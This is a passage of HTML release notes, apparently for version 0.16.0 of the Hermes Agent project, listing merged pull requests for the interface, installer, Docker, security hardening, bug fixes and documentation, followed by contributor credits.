<li>Configurable default interface (cli vs tui) + <code>--cli</code> flag; TUI single <code>/model</code> command + unified Sessions overlay; nudge toward <code>/agents</code> dashboard when delegation starts (<a href="https://github.com/NousResearch/hermes-agent/pull/37782" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37782/hovercard">#37782</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37112" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37112/hovercard">#37112</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34704" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34704/hovercard">#34704</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Thin out setup — Quick Setup via Nous Portal + Full Setup defaults; explain Quick vs Full inline; <code>hermes portal</code> human-readable Portal onboarding alias + full quick-setup Nous flow (<a href="https://github.com/NousResearch/hermes-agent/pull/35723" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35723/hovercard">#35723</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/36227" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36227/hovercard">#36227</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38449" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38449/hovercard">#38449</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38465" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38465/hovercard">#38465</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Set process title to <code>hermes</code> in ps/top/htop; warn on unsupported pip installs + fix stale update-check cache (<a href="https://github.com/NousResearch/hermes-agent/pull/35143" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35143/hovercard">#35143</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34846" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34846/hovercard">#34846</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>TUI perf: stop slow/dead MCP servers from freezing startup; stop eager MCP discovery from blocking agent-capable startup; stop persisting full tool output in trail lines (silent OOM) (<a href="https://github.com/NousResearch/hermes-agent/pull/35273" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35273/hovercard">#35273</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35397" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35397/hovercard">#35397</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38224" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38224/hovercard">#38224</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>TUI fixes: auto-recover session on unexpected gateway death; reassemble split SGR mouse sequences; preserve UTF-8 in PowerShell clipboard; reset terminal input modes on exit; <code>/save</code> snapshots under Hermes home (<a href="https://github.com/NousResearch/hermes-agent/pull/35893" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35893/hovercard">#35893</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38564" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38564/hovercard">#38564</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35222" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35222/hovercard">#35222</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/36864" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36864/hovercard">#36864</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maxmilian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maxmilian">@maxmilian</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38251" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38251/hovercard">#38251</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>)</li>
<li>Setup model/provider pickers migrated off <code>simple_term_menu</code> to curses (ESC + ghost-row fixes); default browser/TTS picker to free local backend, not paid Nous (<a href="https://github.com/NousResearch/hermes-agent/pull/35806" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35806/hovercard">#35806</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37800" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37800/hovercard">#37800</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🔧 Tool System &amp; Installer</h2>
<ul>
<li><code>single managed-uv path</code>, delete fts5 installer escalation; installer commit pinning opt-in (default branch-follow); shallow clones (<a href="https://github.com/NousResearch/hermes-agent/pull/37660" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37660/hovercard">#37660</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37123" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37123/hovercard">#37123</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39423" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39423/hovercard">#39423</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>)</li>
<li><code>ensure_uv()</code> survives the update boundary (no first-run crash); harden venv rebuild + verify core deps after install; require managed marker before destructive clean; stash/restore by default for non-interactive updates (<a href="https://github.com/NousResearch/hermes-agent/pull/39780" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39780/hovercard">#39780</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38887" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38887/hovercard">#38887</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39568" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39568/hovercard">#39568</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39645" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39645/hovercard">#39645</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>)</li>
<li>MCP: stop reporting false OAuth success when no token was obtained; vision honors <code>model.supports_vision</code> in <code>vision_analyze</code> + <code>browser_vision</code>; MiniMax t2a_v2 TTS <code>raise_for_status</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/34807" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34807/hovercard">#34807</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34562" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34562/hovercard">#34562</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39057" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39057/hovercard">#39057</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>yuanbao: cache resolved media resources by resourceId (<a href="https://github.com/NousResearch/hermes-agent/pull/34474" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34474/hovercard">#34474</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🐳 Docker &amp; Deployment</h2>
<ul>
<li>Container reuse + bounded-sync cleanup + orphan reaper; auto-join Docker socket group for docker-in-docker backend; boot non-root containers (skip s6-setuidgid drop when already unprivileged) (<a href="https://github.com/NousResearch/hermes-agent/pull/33645" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33645/hovercard">#33645</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34407" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34407/hovercard">#34407</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34837" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34837/hovercard">#34837</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IAvecilla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IAvecilla">@IAvecilla</a>)</li>
<li>Skip unnecessary boot chown when volume ownership matches remapped UID; seed <code>gateway_state.json</code> from <code>HERMES_GATEWAY_BOOTSTRAP_STATE</code> on first boot; tag containers with hermes-agent labels for identification (<a href="https://github.com/NousResearch/hermes-agent/pull/35027" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35027/hovercard">#35027</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Foldblade/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Foldblade">@Foldblade</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37896" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37896/hovercard">#37896</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
<li>Point TUI launcher at prebuilt bundle via <code>HERMES_TUI_DIR</code>; consolidate node/nix workspace lockfile + update all consumers (<a href="https://github.com/NousResearch/hermes-agent/pull/37923" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37923/hovercard">#37923</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/36171" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36171/hovercard">#36171</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>)</li>
</ul>
<h2>🔒 Security &amp; Reliability</h2>
<ul>
<li><strong><a title="CVE-2026-48710" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-86qp-5c8j-p5mr/hovercard" href="https://github.com/advisories/GHSA-86qp-5c8j-p5mr">CVE-2026-48710</a> (Starlette BadHost)</strong> — pin patched Starlette ≥1.0.1 (<a href="https://github.com/NousResearch/hermes-agent/pull/35118" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35118/hovercard">#35118</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Run URL SSRF checks off the event loop in async paths; strip Bedrock inference bearer token from subprocess env; add <code>bws_cache.json</code> to file-safety read guard; neutralize file paths in mutation-verifier footer (<a href="https://github.com/NousResearch/hermes-agent/pull/39046" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39046/hovercard">#39046</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34498" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34498/hovercard">#34498</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34421" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34421/hovercard">#34421</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35684" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35684/hovercard">#35684</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Restore approval/sudo context in <code>execute_code</code> + guard entry points; add docker restart/stop/kill to <code>DANGEROUS_PATTERNS</code>; sanitize invisible unicode in vetted skill content; deepcopy tools before in-place xAI mutation (<a href="https://github.com/NousResearch/hermes-agent/pull/34497" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34497/hovercard">#34497</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/33438" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33438/hovercard">#33438</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sarbai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sarbai">@Sarbai</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37245" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37245/hovercard">#37245</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34416" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34416/hovercard">#34416</a>)</li>
<li>Sandbox-mirror soft guard for writes to per-task <code>.hermes</code> mirrors; honcho fail-open on startup (<a href="https://github.com/NousResearch/hermes-agent/pull/32213" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32213/hovercard">#32213</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/briandevans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/briandevans">@briandevans</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/24847" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24847/hovercard">#24847</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stephenschoettler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stephenschoettler">@stephenschoettler</a>)</li>
</ul>
<h2>🐛 Notable Bug Fixes</h2>
<ul>
<li><strong>399 issues closed</strong> this window (2 P0, 62 P1, 16 security-tagged, 262 bug-labeled).</li>
<li>Desktop: keep in-flight new chats from vanishing on refresh; Stop button actually interrupts when a turn is queued; stop background session messages bleeding into the active transcript; slash/@ completion menu navigable &amp; Esc-dismissable; IME Enter no longer splits messages (<a href="https://github.com/NousResearch/hermes-agent/pull/37908" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37908/hovercard">#37908</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37948" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37948/hovercard">#37948</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37975" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37975/hovercard">#37975</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37937" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37937/hovercard">#37937</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38333" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38333/hovercard">#38333</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stremtec/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stremtec">@stremtec</a>)</li>
<li>Update: stop stash/restore from clobbering desktop source on managed clones; don't fail desktop rebuild/skills sync on mid-rebuild venv; export launcher virtualenv to uv (<a href="https://github.com/NousResearch/hermes-agent/pull/38542" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38542/hovercard">#38542</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38885" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38885/hovercard">#38885</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35224" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35224/hovercard">#35224</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Voice: honor <code>PIPEWIRE_REMOTE</code> in PortAudio fallback; allow <code>/voice</code> over SSH when a sound server is reachable; restore mistralai (2.4.8 clean, ban lifted) (<a href="https://github.com/NousResearch/hermes-agent/pull/33473" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33473/hovercard">#33473</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dusk1e/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dusk1e">@Dusk1e</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35719" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35719/hovercard">#35719</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34841" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34841/hovercard">#34841</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>📚 Documentation</h2>
<ul>
<li>New Desktop App guide + remote-backend sections (session token, <code>--tui</code> requirement, username/password connect, dashboard/gateway prerequisites) (<a href="https://github.com/NousResearch/hermes-agent/pull/37457" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37457/hovercard">#37457</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38144" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38144/hovercard">#38144</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38180" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38180/hovercard">#38180</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38534" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38534/hovercard">#38534</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39128" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39128/hovercard">#39128</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Dashboard auth-provider suitability + registration across dashboard/Docker/Desktop; network egress isolation guide for Docker (<a href="https://github.com/NousResearch/hermes-agent/pull/39633" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39633/hovercard">#39633</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/26385" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26385/hovercard">#26385</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Manzela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Manzela">@Manzela</a>)</li>
</ul>
<hr>
<p><a target="_blank" rel="noopener noreferrer nofollow" href="https://camo.githubusercontent.com/dce3dbf5bb0dd2266a53228a5fa88f6edfcc799d15ee225429fb919e1a45a8c4/68747470733a2f2f7633622e66616c2e6d656469612f66696c65732f622f30613964323438662f41795242454b533843346f36485a4e46364b6a62445f4d325535793477592e706e67"><img src="https://camo.githubusercontent.com/dce3dbf5bb0dd2266a53228a5fa88f6edfcc799d15ee225429fb919e1a45a8c4/68747470733a2f2f7633622e66616c2e6d656469612f66696c65732f622f30613964323438662f41795242454b533843346f36485a4e46364b6a62445f4d325535793477592e706e67" alt="Hermes Agent v0.16.0 — The Surface Release" data-canonical-src="https://v3b.fal.media/files/b/0a9d248f/AyRBEKS8C4o6HZNF6KjbD_M2U5y4wY.png"></a></p>
<h2>👥 Contributors</h2>
<p>A huge thank-you to the <strong>170 community contributors</strong> (including co-authors) who shipped work in this release.</p>
<h3>Core</h3>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a></li>
</ul>
<h3>Top community contributors (by merged-PR count)</h3>
<ul>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a></strong> (52) — built the desktop app end to end: install, self-update, remote-gateway connect, multi-profile sessions, chat UX, status-bar model picker</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a></strong> (44) — Docker hardening, dashboard auth (OIDC, username/password, refresh-token rotation), desktop OAuth remote connect</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a></strong> (29) — fuzzy model picker, setup/portal onboarding, desktop completion-menu &amp; Stop-button fixes, honcho hardening</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a></strong> (18) — desktop build pipeline (content-hash stamp, build flags), Linux/arm64 desktop support, managed-uv consolidation</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a></strong> (8) — dashboard nous-blue theme + bulk sessions, desktop Providers settings, GUI QoL triage</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a></strong> (7) — Nous tool-pool entitlement surfacing, FAL video-gen managed gateway, supermemory session ingest, matrix aliases</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a></strong> (6) — gateway service-restart flow, update destructive-clean guard, config prefill alignment</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a></strong> (4) — installer commit-pinning opt-in, desktop skills/tools + model-management consolidation</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JimLiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JimLiu">@JimLiu</a></strong> — full Simplified Chinese (简体中文) desktop translation + typed i18n layer</li>
</ul>
<h3>All Contributors</h3>
<p><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xharryriddle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xharryriddle">@0xharryriddle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/a1245582339/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/a1245582339">@a1245582339</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adybag14-cyber/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adybag14-cyber">@adybag14-cyber</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AhmetArif0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AhmetArif0">@AhmetArif0</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alaamohanad169-ship-it/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alaamohanad169-ship-it">@alaamohanad169-ship-it</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alelpoan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alelpoan">@alelpoan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Aman113114-IITD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Aman113114-IITD">@Aman113114-IITD</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amathxbt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amathxbt">@amathxbt</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aminvakil/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aminvakil">@aminvakil</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/annguyenNous/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/annguyenNous">@annguyenNous</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aqilaziz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" 